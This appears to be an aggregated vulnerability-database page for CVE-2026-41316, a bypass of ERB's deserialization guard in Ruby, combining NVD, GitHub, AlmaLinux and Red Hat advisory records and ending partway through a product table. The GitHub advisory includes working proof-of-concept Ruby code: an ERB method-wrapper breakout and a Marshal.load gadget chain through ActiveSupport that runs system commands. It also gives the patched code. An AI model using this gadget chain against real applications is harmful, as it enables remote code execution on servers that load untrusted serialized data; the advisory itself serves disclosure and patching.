"details": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. \n\nSecurity Fix(es): \n\n * erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:18065",
"modified": "2026-05-19T21:54:41Z",
"published": "2026-05-18T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:18065"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-41316"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2461369"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/10/ALSA-2026-18065.html"
}
],
"related": [
"CVE-2026-41316"
],
"summary": "Important: ruby security update"
}
FKIE_CVE-2026-41316
Vulnerability from fkie_nvd - Published: 2026-04-24 03:16 - Updated: 2026-04-29 20:56| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue."
}
],
"id": "CVE-2026-41316",
"lastModified": "2026-04-29T20:56:50.103",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-24T03:16:11.897",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-693"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-Q339-8RMV-2MHV
Vulnerability from github – Published: 2026-04-24 15:36 – Updated: 2026-04-24 15:36Summary
Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an @_init instance variable guard in ERB#result and ERB#run to prevent code execution when an ERB object is reconstructed via Marshal.load (deserialization). However, three other public methods that also evaluate @src via eval() were not given the same guard:
ERB#def_methodERB#def_moduleERB#def_class
An attacker who can trigger Marshal.load on untrusted data in a Ruby application that has erb loaded can use ERB#def_module (zero-arg, default parameters) as a code execution sink, bypassing the @_init protection entirely.
# erb.rb line 838
@_init = self.class.singleton_class
In `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:
# erb.rb line 1008-1012
def result(b=new_toplevel)
unless @_init.equal?(self.class.singleton_class)
raise ArgumentError, "not initialized"
end
eval(@src, b, (@filename || '(erb)'), @lineno)
end
When an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute.
## The Bypass
`ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:
# erb.rb line 1088-1093
def def_method(mod, methodname, fname='(ERB)')
src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
mod.module_eval do
eval(src, binding, fname, -1) # <-- no @_init check
end
end
# erb.rb line 1113-1117
def def_module(methodname='erb') # <-- zero-arg call possible
mod = Module.new
def_method(mod, methodname, @filename || '(ERB)')
mod
end
# erb.rb line 1170-1174
def def_class(superklass=Object, methodname='result') # <-- zero-arg call possible
cls = Class.new(superklass)
def_method(cls, methodname, @filename || '(ERB)')
cls
end
`def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.
### Method wrapper breakout
`def_method` wraps `@src` in a method definition: `"def erb\n" + @src + "\nend\n"`. Code inside a method body only executes when the method is called, not when it's defined. However, by setting `@src` to begin with `end\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:
# Attacker sets @src = "end\nsystem('id')\ndef x"
# After def_method transformation, module_eval receives:
#
# def erb
# end
# system('id') <- executes at eval time
# def x
# end
---
## Proof of Concept
### Minimal (ERB only)
require 'erb'
erb = ERB.allocate
erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
erb.instance_variable_set(:@lineno, 0)
# ERB#result correctly blocks this:
begin
erb.result
rescue ArgumentError => e
puts "result: #{e.message} (blocked by @_init -- correct)"
end
# ERB#def_module does NOT block this -- executes system('id'):
erb.def_module
# Output: uid=0(root) gid=0(root) groups=0(root)
### Marshal deserialization (ERB + ActiveSupport)
When combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:
require 'active_support'
require 'active_support/deprecation'
require 'active_support/deprecation/proxy_wrappers'
require 'erb'
# --- Build payload (replace proxy class for marshaling) ---
real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy
ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
class ActiveSupport::Deprecation
class DeprecatedInstanceVariableProxy
def initialize(h)
h.each { |k, v| instance_variable_set(k, v) }
end
end
end
erb = ERB.allocate
erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")
erb.instance_variable_set(:@lineno, 0)
erb.instance_variable_set(:@filename, nil)
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({
:@instance => erb,
:@method => :def_module,
:@var => "@x",
:@deprecator => Kernel
})
marshaled = Marshal.dump({proxy => 0})
# --- Restore real class and trigger ---
ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)
# This triggers RCE:
Marshal.load(marshaled)
# Output: uid=0(root) gid=0(root) groups=0(root)
**Chain:**
1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key
2. Hash key insertion calls `.hash` on the proxy
3. `.hash` is undefined -> `method_missing(:hash)` -> dispatches to `ERB#def_module`
4. `def_module` -> `def_method` -> `module_eval(eval(src))` -> breakout -> `system('id')`
**Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1
Impact
Scope
Any Ruby application that calls Marshal.load on untrusted data AND has both erb and activesupport loaded is vulnerable to arbitrary code execution. This includes:
- Ruby on Rails applications that import untrusted serialized data -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
- Ruby tools that import untrusted serialized data -- any tool using
Marshal.loadfor caching, data import, or IPC - Legacy Rails apps (pre-7.0) that still use Marshal for cookie session serialization
Severity justification
The @_init guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The def_module bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.
This bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.
### Gadget chain history Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations: | Year | Chain | Mitigated in | |------|-------|-------------| | 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 | | 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 | | 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 | | 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches | | 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 | | **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |Patches
The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.
- ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4
def def_method(mod, methodname, fname='(ERB)')
unless @_init.equal?(self.class.singleton_class)
raise ArgumentError, "not initialized"
end
src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
mod.module_eval do
eval(src, binding, fname, -1)
end
end
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "erb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.3.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "erb"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.4"
},
{
"fixed": "4.0.4.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"4.0.4"
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "erb"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "6.0.1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "erb"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.2"
},
{
"fixed": "6.0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41316"
],
"database_specific": {
"cwe_ids": [
"CWE-693"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-24T15:36:05Z",
"nvd_published_at": "2026-04-24T03:16:11Z",
"severity": "HIGH"
},
"details": "## Summary\n\nRuby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard:\n\n- `ERB#def_method`\n- `ERB#def_module`\n- `ERB#def_class`\n\nAn attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely.\n\n\u003cdetails\u003e\n\n## The @_init Guard\n\nIn `ERB#initialize`, the guard is set:\n\n```ruby\n# erb.rb line 838\n@_init = self.class.singleton_class\n```\n\nIn `ERB#result` and `ERB#run`, the guard is checked before `eval(@src)`:\n\n```ruby\n# erb.rb line 1008-1012\ndef result(b=new_toplevel)\n unless @_init.equal?(self.class.singleton_class)\n raise ArgumentError, \"not initialized\"\n end\n eval(@src, b, (@filename || \u0027(erb)\u0027), @lineno)\nend\n```\n\nWhen an ERB object is reconstructed via `Marshal.load`, `@_init` is either `nil` (not set during marshal reconstruction) or an attacker-controlled value. Since `ERB.singleton_class` cannot be marshaled, the attacker cannot set `@_init` to the correct value, and `result`/`run` correctly refuse to execute.\n\n## The Bypass\n\n`ERB#def_method`, `ERB#def_module`, and `ERB#def_class` all reach `eval(@src)` without checking `@_init`:\n\n```ruby\n# erb.rb line 1088-1093\ndef def_method(mod, methodname, fname=\u0027(ERB)\u0027)\n src = self.src.sub(/^(?!#|$)/) {\"def #{methodname}\\n\"} \u003c\u003c \"\\nend\\n\"\n mod.module_eval do\n eval(src, binding, fname, -1) # \u003c-- no @_init check\n end\nend\n\n# erb.rb line 1113-1117\ndef def_module(methodname=\u0027erb\u0027) # \u003c-- zero-arg call possible\n mod = Module.new\n def_method(mod, methodname, @filename || \u0027(ERB)\u0027)\n mod\nend\n\n# erb.rb line 1170-1174\ndef def_class(superklass=Object, methodname=\u0027result\u0027) # \u003c-- zero-arg call possible\n cls = Class.new(superklass)\n def_method(cls, methodname, @filename || \u0027(ERB)\u0027)\n cls\nend\n```\n\n`def_module` and `def_class` accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.\n\n### Method wrapper breakout\n\n`def_method` wraps `@src` in a method definition: `\"def erb\\n\" + @src + \"\\nend\\n\"`. Code inside a method body only executes when the method is called, not when it\u0027s defined. However, by setting `@src` to begin with `end\\n`, the attacker closes the method definition early. Code after the first `end` executes immediately at `module_eval` time:\n\n```ruby\n# Attacker sets @src = \"end\\nsystem(\u0027id\u0027)\\ndef x\"\n# After def_method transformation, module_eval receives:\n#\n# def erb\n# end\n# system(\u0027id\u0027) \u003c- executes at eval time\n# def x\n# end\n```\n\n---\n\n## Proof of Concept\n\n### Minimal (ERB only)\n\n```ruby\nrequire \u0027erb\u0027\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, \"end\\nsystem(\u0027id\u0027)\\ndef x\")\nerb.instance_variable_set(:@lineno, 0)\n\n# ERB#result correctly blocks this:\nbegin\n erb.result\nrescue ArgumentError =\u003e e\n puts \"result: #{e.message} (blocked by @_init -- correct)\"\nend\n\n# ERB#def_module does NOT block this -- executes system(\u0027id\u0027):\nerb.def_module\n# Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n### Marshal deserialization (ERB + ActiveSupport)\n\nWhen combined with `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy` as a method dispatch gadget, this achieves RCE via `Marshal.load`:\n\n```ruby\nrequire \u0027active_support\u0027\nrequire \u0027active_support/deprecation\u0027\nrequire \u0027active_support/deprecation/proxy_wrappers\u0027\nrequire \u0027erb\u0027\n\n# --- Build payload (replace proxy class for marshaling) ---\nreal_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\nActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)\nclass ActiveSupport::Deprecation\n class DeprecatedInstanceVariableProxy\n def initialize(h)\n h.each { |k, v| instance_variable_set(k, v) }\n end\n end\nend\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, \"end\\nsystem(\u0027id\u0027)\\ndef x\")\nerb.instance_variable_set(:@lineno, 0)\nerb.instance_variable_set(:@filename, nil)\n\nproxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({\n :@instance =\u003e erb,\n :@method =\u003e :def_module,\n :@var =\u003e \"@x\",\n :@deprecator =\u003e Kernel\n})\n\nmarshaled = Marshal.dump({proxy =\u003e 0})\n\n# --- Restore real class and trigger ---\nActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)\nActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)\n\n# This triggers RCE:\nMarshal.load(marshaled)\n# Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n**Chain:**\n1. `Marshal.load` reconstructs a Hash with a `DeprecatedInstanceVariableProxy` as key\n2. Hash key insertion calls `.hash` on the proxy\n3. `.hash` is undefined -\u003e `method_missing(:hash)` -\u003e dispatches to `ERB#def_module`\n4. `def_module` -\u003e `def_method` -\u003e `module_eval(eval(src))` -\u003e breakout -\u003e `system(\u0027id\u0027)`\n\n**Verified on:** Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1\n\n\n\u003c/details\u003e\n\n## Impact\n### Scope\n\nAny Ruby application that calls `Marshal.load` on untrusted data AND has both `erb` and `activesupport` loaded is vulnerable to arbitrary code execution. This includes:\n\n- **Ruby on Rails applications that import untrusted serialized data** -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC\n- **Ruby tools that import untrusted serialized data** -- any tool using `Marshal.load` for caching, data import, or IPC\n- **Legacy Rails apps** (pre-7.0) that still use Marshal for cookie session serialization\n\n### Severity justification\n\nThe `@_init` guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke\u0027s November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz\u0027s 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The `def_module` bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.\n\nThis bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.\n\n\u003cdetails\u003e\n\n### Gadget chain history\n\nSix generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:\n\n| Year | Chain | Mitigated in |\n|------|-------|-------------|\n| 2018 | Gem::Requirement (Luke Jahnke) | RubyGems 3.0 |\n| 2021 | UDG -- TarReader+WriteAdapter (vakzz) | RubyGems 3.1 |\n| 2022 | Gem::Specification._load (vakzz) | RubyGems 3.6 |\n| 2024 | UncaughtThrowError (Luke Jahnke) | Ruby 3.4 patches |\n| 2024 | Gem::Source::Git#rev_parse | RubyGems 3.6 |\n| **2026** | **ERB#def_module @_init bypass** | **ERB 6.0.4** |\n\n\u003c/details\u003e\n\n## Patches\n\nThe problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.\n\n* ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4\n\n\u003cdetails\u003e\n\nAdd the `@_init` check to `def_method`. Since `def_module` and `def_class` both delegate to `def_method`, this single change covers all three bypass paths:\n\n```ruby\ndef def_method(mod, methodname, fname=\u0027(ERB)\u0027)\n unless @_init.equal?(self.class.singleton_class)\n raise ArgumentError, \"not initialized\"\n end\n src = self.src.sub(/^(?!#|$)/) {\"def #{methodname}\\n\"} \u003c\u003c \"\\nend\\n\"\n mod.module_eval do\n eval(src, binding, fname, -1)\n end\nend\n```\n\n\u003c/details\u003e\n\n-----",
"id": "GHSA-q339-8rmv-2mhv",
"modified": "2026-04-24T15:36:05Z",
"published": "2026-04-24T15:36:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316"
},
{
"type": "PACKAGE",
"url": "https://github.com/ruby/erb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "ERB has an @_init deserialization guard bypass via def_module / def_method / def_class"
}
RHSA-2026:18030
Vulnerability from csaf_redhat - Published: 2026-05-18 13:12 - Updated: 2026-05-18 14:18A flaw was found in ERB, a templating system for Ruby. An attacker who can trigger deserialization of untrusted data in a Ruby application can bypass existing protections. This vulnerability allows for arbitrary code execution by exploiting specific public methods that evaluate template source code, which were not properly guarded against deserialization attacks.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
